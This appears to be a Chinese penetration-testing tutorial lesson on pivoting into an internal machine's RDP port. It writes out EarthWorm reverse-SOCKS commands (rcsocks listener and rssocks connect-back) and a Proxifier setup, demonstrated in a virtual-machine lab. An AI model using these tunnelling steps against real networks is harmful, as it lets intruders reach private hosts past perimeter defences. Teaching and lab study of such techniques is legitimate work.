SoKu前言
在第五课我们讲了如何转发一台有公网IP的3389端口,而且是本机之间的端口转发。这节课我们来讲一下,如何转发内网的一台机器的3389端口。
内网思维导图
如果我的机器想要连接内网的192.168.126.128的3389端口,我们直接连接是连不通的,必须通过一台有公网IP的机器为媒介。
我们在192.168.126.128机器上,通过工具EarthWorm反弹到有公网IP机器192.168.126.135,把192.168.126.135做成socks服务器。
我们本机再装一个Proxifier,连接192.168.126.135,然后192.168.126.135就成为我们的一个媒介了,我们就可以直接连到192.168.126.128了。
请注意,我把IP192.168.126.135都黑体标注了一下,是因为我是在用虚拟机给你写文章演示,在这篇文章中你把192.168.126.135这个IP当作是一个公网IP就行了。说起来很复杂,其实很简单,两个工具操作几步,配合就能完成了。
一、在192.168.126.135的机器上运行EarthWorm监听
命令是:注意看图里的命令。
ew.exe -s rcsocks -l 1080 -e 8888命令里边的1080端口是把192.168.126.135做成socks5监听的端口,8888是接收内网机器反弹的端口。这两个端口的数字你可以随便改的。
二、内网机器192.168.126.128执行命令反弹到192.168.126.135
命令是:
ew -s rssocks -d 192.168.126.135 -e 8888此条命令的8888端口要和上文的8888端口对应。
此时,你的192.168.126.135的机器就有反应了。
三、本机装一个Proxifier,做好socks5规则,打通通道
1、点击Proxifier配置文件选项的代理服务器,再点添加。
2、填加IP192.168.126.135为socks5服务器,1080端口要和第一条命令的1080端口对应。
3、现在直接你本机就可以打通了和内网机器192.168.126.128的通道了、你可以直接3389远程连上了。当然,其它的端口你也可以连上。
总结:
方法就是如此的简单。EarthWorm还有升级版,名字为Termite,不过更为复杂了,所以我介绍EarthWorm给大家使用。EarthWorm和Proxifier都可以百度搜索到,所以我就不提供下载地址了,而且EarthWorm有Linux版的,运行方法和本文是一样的。
另外,如果内网机器192.168.126.128不能上网,你有办法把它的端口转发出来吗?
提示,如果内网还有一台192.168.126.127机器能上网,你完全可能利用192.168.126.127把192.168.126.128的端口转发出来的,自行去研究一下EarthWorm和Proxifier吧。
1.支付成功后不要关闭二维码,等待系统确认后自动关闭,支付按钮 变为 下载按钮。
2.游客购买请使用 Chrome 、Edge 或 FireFox浏览器 ,以免支付刷新失败(浏览器缓存7天有效)。
3.如支付成功后刷新无法显示下载按钮、链接失效等问题请联系客服处理或参考下载说明文档 。
免责声明:
1.本站资源售价仅为赞助网站,收费仅用于网站维护运营更新,感谢您的支持。
2.本站所发布资源仅限用于学习和研究测试使用,不得用于商业或非法用途。
3.如果购买下载测试后满意,请前往购买支持正版,得到更好的正版服务。
4.本站仅保证资源的正常下载和测试使用,售后不包含相关技术咨询服务,请知悉谅解。
5.本站所发布资源为非实物商品,不接受退款,请考虑好再购买。
Soku云宝库 » 黑客渗透教程_WEB渗透入门_第六课:本机端口之间如何数据转发?
![[视频教程]WEB安全白帽培训教程【入门+基础38节课】](https://sk.zmoyun.com/wp-content/uploads/2020/06/1592332431-aaf3cfd8b47be17.jpg)
![[视频教程]网络Web渗透教程培训_黑麒麟VIP2018全集_实战渗透篇](https://sk.zmoyun.com/wp-content/uploads/2020/06/1592328445-1a78659e5ed5887.jpg)
